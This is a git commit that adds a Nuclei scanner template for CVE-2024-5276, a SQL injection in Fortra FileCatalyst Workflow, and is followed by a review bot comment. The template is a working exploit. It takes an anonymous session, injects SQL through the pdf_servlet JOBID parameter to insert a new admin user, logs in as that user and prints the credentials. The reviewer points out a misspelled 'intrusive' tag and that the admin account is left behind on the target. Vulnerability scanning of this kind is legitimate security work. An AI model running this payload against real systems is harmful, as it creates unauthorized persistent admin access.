Create CVE-2024-5276.yaml

patch-12
Dhiyaneshwaran 2024-09-18 23:25:29 +05:30 committed by GitHub
parent 500b429d73
commit 6500e7509d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 132 additions and 0 deletions


@ -0,0 +1,132 @@
id: CVE-2024-5276
info:
name: Fortra FileCatalyst Workflow <= v5.1.6 build 135 Unauthenticated SQLi
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data.  Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
reference:
- https://www.tenable.com/security/research/tra-2024-25
- https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0
- https://www.fortra.com/security/advisory/fi-2024-008
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5276
cwe-id: CWE-20
epss-score: 0.00198
epss-percentile: 0.57788
metadata:
fofa-query: body="FileCatalyst file transfer solution, easily transfer large files"
verified: true
tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive
variables:
ctxpath: "workflow"
username: "{{randstr}}"
password: '{{randstr_2}}'
password_enc: "{{to_upper(md5(password))}}"
payload: "1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{{to_lower(username)}}', NULL, '{{password_enc}}', '{{to_lower(username)}}FirstName', '{{to_lower(username)}}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{{to_lower(username)}}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"
http:
- raw:
- |
GET /{{ctxpath}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: jsessionid
internal: true
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'logonAnonymous.do'
internal: true
extractors:
- type: regex
part: body
group: 1
name: anonurl
internal: true
regex:
- 'href="(.*)" class="btn btn-outline-primary" id="logonAnonymousLink"'
- raw:
- |
GET {{anonurl}} HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1
Host: {{Hostname}}
disable-cookie: true
extractors:
- type: regex
part: body
group: 1
name: fcweb_token
internal: true
regex:
- 'name="FCWEB.FORM.TOKEN" value="([A-Za-z0-9]+)"'
- type: regex
part: body
group: 1
name: jsessionid2
internal: true
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
- raw:
- |
POST /{{ctxpath}}/logon.do HTTP/1.1
Host: {{Hostname}}
Cookie: JSESSIONID={{jsessionid2}}
Content-Type: application/x-www-form-urlencoded
FCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&
disable-cookie: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username/password are not correct'
- 'Your session timed out.'
negative: true
- type: word
part: body
words:
- '<title>FileCatalyst Workflow Administration</title>'
- '{{to_lower(username)}}'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
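Review bot: The `instrusive` tag on the `tags:` line is misspelled, so this template will not be caught by tag-based filters such as `-exclude-tags intrusive`, even though its `pdf_servlet` request writes a new administrative row into the target's `DOCTERA_USERS` table that nothing in the template removes; the line should read `tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,intrusive`. The `description:` block should also state that a successful run persists an admin account and prints its credentials through the final dsl extractor, so the operator knows to delete that account after the test (a sentence such as `Running this template creates a persistent administrative user that must be removed manually.` would suffice). The classification maps a SQL injection to `CWE-20`; `CWE-89` is the usual mapping for this class of issue, so verify against the NVD record before merging. Indentation is not preserved in the rendered view, so the nesting of the `http:` requests is inferred from key order and should be checked in the raw file.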